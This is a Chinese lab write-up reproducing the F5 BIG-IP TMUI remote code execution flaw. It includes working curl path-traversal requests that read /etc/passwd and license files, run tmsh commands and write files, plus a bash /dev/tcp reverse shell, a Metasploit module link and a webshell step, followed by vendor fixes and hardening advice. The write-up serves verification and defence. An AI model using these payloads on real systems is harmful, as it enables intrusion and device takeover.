“当前已有100+用户参与分享,共计发放奖励50000+“
0x00 背景
前一段时间关于F5 BIGIP 远程代码执行漏洞很火,自己在很多AD项目都替换过F5的设备,加上最近一个银行项目已经用AD替换了F5的负载,所以来实际测试下漏洞的危害。
0x01 环境
影响版本:
BIG-IP 15.x: 15.1.0/15.0.0
BIG-IP 14.x: 14.1.0 ~ 14.1.2
BIG-IP 13.x: 13.1.0 ~ 13.1.3
BIG-IP 12.x: 12.1.0 ~ 12.1.5
BIG-IP 11.x: 11.6.1 ~ 11.6.5
实验环境:
vm workstation 15
BIG-IP 15.0.0 VE
kali 2020
0x02 环境搭建
打开F5的网页注册获取秘钥
https://www.f5.com.cn/trials/big-ip-virtual-edition
打开下载页面下载特定版本的VE
https://downloads.f5.com/esd/product.jsp?sw=BIG-IP&pro=big-ip_v11.x&ver=11.6.4
(现在已经可能由于漏洞原因不提供下载了,不过通过万能的网盘还是找到了15.0.0的ova)
导入vm workstation
使用默认用户名root/default登录,第一次登录会要求修改密码此处修改为sangfor123
输入config 配置网络
配置ip为xxxxxxxxxx/xxxxxxxxxxxx
登录管理地址https://ip,用户密码xxxxxxxxxxxx,登陆后修改密码此处修改为sangfor@123
登录后点击next导入授权信息
根据之前注册时申请的临时授权导入
复制step1里面的内容
将得到的授权导入激活step3,点击next激活,重新登录即可
0x03 漏洞验证
读取/etc/passwd
curl -k "https://xxxxxxxxxtmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"
读取/etc/hosts
curl -k "https://xxxxxxxxxxxxx/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts"
读取/config/bigip.license
curl -k "https://xxxxxxxxxxxxxxx/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license"
执行list+auth+user+**
curl -k "https://xxxxxxxxxxxxx/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+**"
文件写入读取
curl -k "https://xxxxxxxxxxx/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/11&content=sangfor123"
curl -k "https://xxxxxxxxxx/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/tmp/11"
msf反弹shell
github上已经有对应RCE
https://github.com/rapid7/metasploit-framework/blob/0417e88ff24bf05b8874c953bd91600f10186ba4/modules/exploits/linux/http/f5_bigip_tmui_rce.rb
下载后导入msf重载下即可使用
设置对应参数
成功getshell
同时也可以直接通过bash转发shell
nc -nvlp 8080开启监听
然后在前面的session中
bash -i >& /dev/tcp/xxxxxxxxxxxxx/8080 0>&1 将shell反弹到xxxxxxxxxxxxxxxx的8080端口
建立连接
root权限
查看之前上传的文件
bash写入一句话webshell
蚁剑直连完事
apache用户权限一般
0x04 总结
可以看到F5 BIGIP 的远程代码执行漏洞,可以让未授权的远程攻击者通过向该页面发送特制的请求包,可以造成任意代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。
官方修复意见
1.升级到以下版本
• BIG-IP 15.x: 15.1.0.4
• BIG-IP 14.x: 14.1.2.6
• BIG-IP 13.x: 13.1.3.4
• BIG-IP 12.x: 12.1.5.2
• BIG-IP 11.x: 11.6.5.2
2.httpd对请求过滤重定向
tmsh
edit /sys httpd all-properties
include
<LocationMatch ".*\.\.;.*">
Redirect 404 /
</LocationMatch>
3.限制访问tmui的IP
对于我们工程师平常部署设备时,很多时候为了方便把比如管理界面或者SSH端口暴露在公网上,这样无疑给外部攻击者提供了更多的切入口,世上没有完全安全的系统或者设备,谁又能知道下一个高危洞会不会轮到sangfor呢?所以我们在交付时,尽可能将访问权限及地址最小化,无疑可以避免很多潜在的风险。